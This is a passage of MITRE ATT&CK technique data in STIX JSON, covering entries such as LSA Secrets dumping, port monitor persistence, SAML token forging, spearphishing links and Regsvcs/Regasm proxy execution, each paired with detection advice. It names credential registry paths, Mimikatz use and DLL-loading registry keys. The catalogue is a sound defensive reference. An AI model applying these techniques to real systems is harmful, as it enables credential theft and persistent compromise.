"Administrator", "root"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "created": "2020-01-23T17:46:59.535Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1547", "external_id": "T1547"}, {"source_name": "Cylance Reg Persistence Sept 2013", "description": "Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.", "url": "https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order"}, {"source_name": "MSDN Authentication Packages", "description": "Microsoft. (n.d.). Authentication Packages. Retrieved March 1, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx"}, {"source_name": "Microsoft Run Key", "description": "Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014.", "url": "http://msdn.microsoft.com/en-us/library/aa376977"}, {"source_name": "Microsoft TimeProvider", "description": "Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.", "url": "https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx"}, {"source_name": "Linux Kernel Programming", "description": "Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel Module Programming Guide. Retrieved April 6, 2018.", "url": "https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf"}, {"source_name": "TechNet Autoruns", "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "LSA Secrets", "description": "Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\\SECURITY\\Policy\\Secrets. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)\n\n[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Ed Williams, Trustwave, SpiderLabs"], "x_mitre_detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "created": "2020-02-21T16:22:09.493Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1003/004", "external_id": "T1003.004"}, {"source_name": "Passcape LSA Secrets", "description": "Passcape. (n.d.). Windows LSA secrets. Retrieved February 21, 2020.", "url": "https://www.passcape.com/index.php?section=docsys&cmd=details&id=23"}, {"source_name": "Microsoft AD Admin Tier Model", "description": "Microsoft. (2019, February 14). Active Directory administrative tier model. Retrieved February 21, 2020.", "url": "https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN"}, {"source_name": "Tilbury Windows Credentials", "description": "Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack, Mitigation, Defense. Retrieved February 21, 2020.", "url": "https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf"}, {"source_name": "ired Dumping LSA Secrets", "description": "Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets. Retrieved February 21, 2020.", "url": "https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets"}, {"source_name": "Powersploit", "description": "PowerSploit. (n.d.). Retrieved December 4, 2014.", "url": "https://github.com/mattifestation/PowerSploit"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Port Monitors", "description": "A port monitor can be set through the (Citation: AddMonitor) API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. \n\nThe Registry key contains entries for the following:\n\n* Local Port\n* Standard TCP/IP Port\n* USB Monitor\n* WSD Port\n\nAdversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Stefan Kanthak", "Travis Smith, Tripwire"], "x_mitre_detection": "* Monitor process API calls to (Citation: AddMonitor).\n* Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal.\n* New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious.\n* Monitor Registry writes to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors.\n* Run the Autoruns utility, which checks for this Registry key as a persistence mechanism (Citation: TechNet Autoruns)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_effective_permissions": ["SYSTEM"], "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1f47e2fd-fa77-4f2f-88ee-e85df308f125", "created": "2017-05-31T21:30:26.057Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1013", "external_id": "T1013"}, {"source_name": "AddMonitor", "description": "Microsoft. (n.d.). AddMonitor function. Retrieved November 12, 2014.", "url": "http://msdn.microsoft.com/en-us/library/dd183341"}, {"source_name": "Bloxham", "description": "Bloxham, B. (n.d.). Getting Windows to Play with Itself [PowerPoint slides]. Retrieved November 12, 2014.", "url": "https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf"}, {"source_name": "TechNet Autoruns", "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Weaken Encryption", "description": "Adversaries may compromise a network device\u2019s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)\n\nEncryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.\n\nAdversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device\u2019s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "There is no documented method for defenders to directly identify behaviors that weaken encryption. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601). Some detection methods require vendor support to aid in investigation.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Network"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Encryption"], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1f9012ef-1e10-4e48-915e-e03563435fe8", "created": "2020-10-19T18:47:08.759Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1600", "external_id": "T1600"}, {"source_name": "Cisco Synful Knock Evolution", "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.", "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices"}, {"source_name": "Cisco Blog Legacy Device Attacks", "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-03-01T17:55:56.116Z", "name": "SAML Tokens", "description": "An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter value of the conditions ... element in a token. This value can be changed using the AccessTokenLifetime in a LifetimeTokenPolicy.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)\n\nAn adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.\n\nAn adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Blake Strom, Microsoft 365 Defender", "Oleg Kolesnikov, Securonix", "Jack Burns, HubSpot"], "x_mitre_deprecated": false, "x_mitre_detection": "This technique may be difficult to detect as SAML tokens are signed by a trusted certificate. The forging process may not be detectable since it is likely to happen outside of a defender's visibility, but subsequent usage of the forged token may be seen. Monitor for anomalous logins using SAML tokens created by a compromised or adversary generated token-signing certificate. These logins may occur on any on-premises resources as well as from any cloud environment that trusts the certificate.(Citation: Microsoft SolarWinds Customer Guidance) Search for logins to service providers using SAML SSO which do not have corresponding 4769, 1200, and 1202 events in the Domain.(Citation: Sygnia Golden SAML)\n\nConsider modifying SAML responses to include custom elements for each service provider. Monitor these custom elements in service provider access logs to detect any anomalous requests.(Citation: Sygnia Golden SAML)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Azure AD", "SaaS", "Windows", "Office 365", "Google Workspace", "IaaS"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1f9c2bae-b441-4f66-a8af-b65946ee72f2", "created": "2020-12-17T15:24:12.240Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1606/002", "external_id": "T1606.002"}, {"source_name": "Microsoft SolarWinds Steps", "description": "Lambert, J. (2020, December 13). Important steps for customers to protect themselves from recent nation-state cyberattacks. Retrieved December 17, 2020.", "url": "https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/"}, {"source_name": "Microsoft SAML Token Lifetimes", "description": "Microsoft. (2020, December 14). Configurable token lifetimes in Microsoft Identity Platform. Retrieved December 22, 2020.", "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-configurable-token-lifetimes"}, {"source_name": "Microsoft SolarWinds Customer Guidance", "description": "MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 17, 2020.", "url": "https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/"}, {"source_name": "Cyberark Golden SAML", "description": "Reiner, S. (2017, November 21). Golden SAML: Newly Discovered Attack Technique Forges Authentication to Cloud Apps. Retrieved December 17, 2020.", "url": "https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps"}, {"source_name": "Sygnia Golden SAML", "description": "Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved January 6, 2021.", "url": "https://www.sygnia.co/golden-saml-advisory"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Spearphishing Link", "description": "Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Shailesh Tiwary (Indian Army)", "Mark Wee", "Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)", "Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)"], "x_mitre_detection": "URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.\n\nBecause this technique usually involves user interaction on the endpoint, many of the possible detections for Spearphishing Link take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS", "Linux", "Office 365", "SaaS"], "x_mitre_version": "1.1", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--20138b9d-1aac-4a26-8654-a36b6bbf2bba", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1192", "external_id": "T1192"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/163.html", "external_id": "CAPEC-163"}, {"source_name": "Trend Micro Pawn Storm OAuth 2017", "description": "Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019.", "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2023-06-14T23:03:51.540Z", "name": "Masquerade File Type", "description": "Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the file\u2019s signature, extension, and contents. Various file types have a typical standard format, including how they are encoded and organized. For example, a file\u2019s signature (also known as header or magic bytes) is the beginning bytes of a file and is often used to identify the file\u2019s type. For example, the header of a JPEG file, is 0xFF 0xD8 and the file extension is either `.JPE`, `.JPEG` or `.JPG`. \n\nAdversaries may edit the header\u2019s hex code and/or the file extension of a malicious payload in order to bypass file validation checks and/or input sanitization. This behavior is commonly used when payload files are transferred (e.g., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and stored (e.g., [Upload Malware](https://attack.mitre.org/techniques/T1608/001)) so that adversaries may move their malware without triggering detections. \n\nCommon non-executable file types and extensions, such as text files (`.txt`) and image files (`.jpg`, `.gif`, etc.) may be typically treated as benign. Based on this, adversaries may use a file extension to disguise malware, such as naming a PHP backdoor code with a file name of test.gif. A user may not know that a file is malicious due to the benign appearance and file extension.\n\nPolygot files, which are files that have multiple different file types and that function differently based on the application that will execute them, may also be used to disguise malicious malware and capabilities.(Citation: polygot_icedID)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["CrowdStrike Falcon OverWatch", "Ben Smith, @ezaspy"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--208884f1-7b83-4473-ac22-4e1cf6c41471", "created": "2023-03-08T22:40:06.918Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1036/008", "external_id": "T1036.008"}, {"source_name": "polygot_icedID", "description": "Lim, M. (2022, September 27). More Than Meets the Eye: Exposing a Polyglot File That Delivers IcedID. Retrieved September 29, 2022.", "url": "https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-11-08T14:00:00.188Z", "name": "Service Stop", "description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor processes and command-line arguments to see if critical processes are terminated or stop running.\n\nMonitor for edits for modifications to services and startup programs that correspond to services of high importance. Look for changes to services that do not correlate with known software, patch cycles, etc. Windows service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. Systemd service unit files are stored within the /etc/systemd/system, /usr/lib/systemd/system/, and /home/.config/systemd/user/ directories, as well as associated symbolic links.\n\nAlterations to the service binary path or the service startup type changed to disabled may be suspicious.\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "macOS"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Availability"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b", "created": "2019-03-29T19:00:55.901Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1489", "external_id": "T1489"}, {"source_name": "SecureWorks WannaCry Analysis", "description": "Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019.", "url": "https://www.secureworks.com/research/wcry-ransomware-analysis"}, {"source_name": "Talos Olympic Destroyer 2018", "description": "Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.", "url": "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html"}, {"source_name": "Novetta Blockbuster", "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.", "url": "https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Malware", "description": "Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)\n\nAs with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.\n\nSome aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--212306d8-efa4-44c9-8c2d-ed3d2e224aa0", "created": "2020-10-01T01:33:01.433Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1587/001", "external_id": "T1587.001"}, {"source_name": "Mandiant APT1", "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"}, {"source_name": "Kaspersky Sofacy", "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.", "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/"}, {"source_name": "ActiveMalwareEnergy", "description": "Dan Goodin. (2014, June 30). Active malware operation let attackers sabotage US energy industry. Retrieved March 9, 2017.", "url": "https://arstechnica.com/information-technology/2014/06/active-malware-operation-let-attackers-sabotage-us-energy-industry/"}, {"source_name": "FBI Flash FIN7 USB", "description": "The Record. (2022, January 7). FBI: FIN7 hackers target US companies with BadUSB devices to install ransomware. Retrieved January 14, 2022.", "url": "https://therecord.media/fbi-fin7-hackers-target-us-companies-with-badusb-devices-to-install-ransomware/"}, {"source_name": "FireEye APT29", "description": "FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015.", "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Regsvcs/Regasm", "description": "Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)\n\nAdversaries can use Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Both utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Casey Smith"], "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.2", "x_mitre_defense_bypassed": ["Process whitelisting", "Digital Certificate Validation"], "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--215190a9-9f02-4e83-bb5f-e0589965a302", "created": "2017-05-31T21:31:33.499Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1121", "external_id": "T1121"}, {"source_name": "MSDN Regsvcs", "description": "Microsoft. (n.d.). Regsvcs.exe (.NET Services Installation Tool). Retrieved July 1, 2016.", "url": "https://msdn.microsoft.com/en-us/library/04za0hca.aspx"}, {"source_name": "MSDN Regasm", "description": "Microsoft. (n.d.). Regasm.exe (Assembly Registration Tool). Retrieved July 1, 2016.", "url": "https://msdn.microsoft.com/en-us/library/tzat5yw6.aspx"}, {"source_name": "LOLBAS Regsvcs", "description": "LOLBAS. (n.d.). Regsvcs.exe. Retrieved July 31, 2019.", "url": "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/"}, {"source_name": "LOLBAS Regasm", "description": "LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.", "url": "https://lolbas-project.github.io/lolbas/Binaries/Regasm/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2023-10-31T14:00:00.188Z", "name": "Device Driver Discovery", "description": "Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).\n\nMany OS utilities may provide information about local device drivers, such as `driverquery.exe` and the `EnumDeviceDrivers()` API function on Windows.(Citation: 